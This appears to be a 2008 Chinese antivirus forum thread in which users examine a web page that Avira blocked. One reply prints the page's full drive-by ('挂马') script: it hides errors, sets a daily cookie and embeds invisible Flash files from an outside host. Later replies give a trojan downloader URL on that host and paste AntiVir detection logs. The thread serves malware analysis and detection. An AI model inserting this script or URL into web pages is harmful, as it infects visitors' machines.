查看: 3177|回复: 14
收起左侧

[病毒样本] H网红伞阻挡的东东

[复制链接]
周勃
发表于 2008-7-7 17:44:46 | 显示全部楼层 |阅读模式
可能是广告?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
saber123
发表于 2008-7-7 17:50:20 | 显示全部楼层
原帖由 周勃 于 2008-7-7 17:44 发表
可能是广告?
305162

<html>
<script>window.onerror=function(){return true;}</script>
<script>
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="http://sda.jhsadk817bb.com/4561.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src=http://sda.jhsadk817bb.com/4561.swf"/>');
document.write('</object>');
}
else{document.write("<EMBED src=http://sda.jhsadk817bb.com/4562.swf width=0 height=0>");}
}
</script>
<html>
太明显的挂马语句了..就 是正常红伞都可能报

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
周勃
 楼主| 发表于 2008-7-7 17:58:06 | 显示全部楼层

回复 2楼 saber123 的帖子

可大多数杀软都没报
Palkia
发表于 2008-7-7 18:12:17 | 显示全部楼层
duba 0
saber123
发表于 2008-7-7 18:34:22 | 显示全部楼层
原帖由 周勃 于 2008-7-7 17:58 发表
可大多数杀软都没报

主要没下载东西..还有个下载的东西杀软没病毒库特征码..

还有就是WEB反病毒根本没做好好
周勃
 楼主| 发表于 2008-7-7 18:47:23 | 显示全部楼层

回复 5楼 saber123 的帖子

难怪
我根本就是禁用WEB监控的。
失翼天使
发表于 2008-7-7 20:48:28 | 显示全部楼层
直接拦了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
tanlimo
发表于 2008-7-7 20:52:58 | 显示全部楼层
http://sda.jhsadk817bb.com/kao.exe



[ 本帖最后由 tanlimo 于 2008-7-7 21:06 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Kitman
发表于 2008-7-7 21:11:36 | 显示全部楼层
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL:         http://bbs.kafan.cn/attachment.p ... eb&t=1215436245
Information:         Is the Trojan horse TR/Crypt.XDR.Gen

Generated by AntiVir WebGuard 8.0.13.0, AVE 8.1.0.64, VDF 7.0.5.57
毒枭
发表于 2008-7-7 23:01:24 | 显示全部楼层
附件:Contains suspicious code HEUR/HTML.Malware

kao.exe
Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL:         http://sda.jhsadk817bb.com/kao.exe
Information:         Is the Trojan horse TR/Downloader.Gen 


Generated by AntiVir WebGuard 8.0.13.0, AVE 8.1.0.64, VDF 7.0.5.56

[ 本帖最后由 毒枭 于 2008-7-7 23:02 编辑 ]
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-3 06:49 , Processed in 0.128841 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表